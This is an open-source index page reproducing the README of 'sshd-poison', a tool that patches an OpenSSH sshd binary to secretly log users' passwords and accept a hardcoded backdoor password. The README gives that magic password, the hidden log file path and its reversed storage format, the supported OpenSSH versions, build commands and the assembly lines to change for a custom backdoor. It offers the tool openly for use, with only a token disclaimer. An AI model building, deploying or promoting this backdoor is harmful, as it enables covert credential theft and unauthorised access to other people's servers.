Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/hc0d3r/sshd-poison

sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.
https://github.com/hc0d3r/sshd-poison

credentials-gathering elf hook magic-pass ssh

Last synced: 22 days ago
JSON representation

sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.

Host: GitHub
URL: https://github.com/hc0d3r/sshd-poison
Owner: hc0d3r
Created: 2019-05-12T11:03:35.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2020-12-16T17:26:57.000Z (almost 4 years ago)
Last Synced: 2024-08-05T09:15:53.251Z (4 months ago)
Topics: credentials-gathering, elf, hook, magic-pass, ssh
Language: C
Homepage:
Size: 896 KB
Stars: 92
Watchers: 9
Forks: 25
Open Issues: 2
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-network-stuff - **66**星

README

sshd-poison
===========

sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.

This only works with x86_64-elf file. Should work with openssh 7.7p1 up to 8.3p1. The code need some modifications to work with older versions.

OpenSSH versions tested:

* OpenSSH_7.9p1 Debian-10+deb10u2, OpenSSL 1.1.1d 10 Sep 2019
* OpenSSH_8.3p1, OpenSSL 1.1.1g 21 Apr 2020

Magic-pass
----------

Unhappily, the power of this magic is a bit limited.
If you try login as root, and root login is not allowed, or if the user isn't valid, it won't work.

magic-pass is ```anneeeeeeeeeeee```.

Logfile
-------

Captured passwords are stored in ```/tmp/.nothing```.

The strings are saved in reverse order in the following format: ```\0password\0user\0ip```, or rather ```\0drowssap\0resu\0pi```.

Compiling
---------

```
$ git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
$ cd sshd-poison
$ make
```

If you want a different magic-pass/logfile, edit the following lines in **sc.asm**.

```sh
magic_pass: db 'anneeeeeeeeeeee', 0x0
logfile: db '/tmp/.nothing', 0x0
```

Demo
----

![](https://raw.githubusercontent.com/hc0d3r/sshd-poison/media/demo.gif)

Legal disclaimer
----------

Use for illegal purposes are not allowed.

Contributing
------------
You can help with code, or donating money.
If you wanna help with code, use the kernel code style as a reference.

Paypal: [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=RAG26EKAYHQSY&currency_code=BRL&source=url)

BTC: 19p3bnJ1t7DByfD8LdgU6WRSnUc2ftBxkP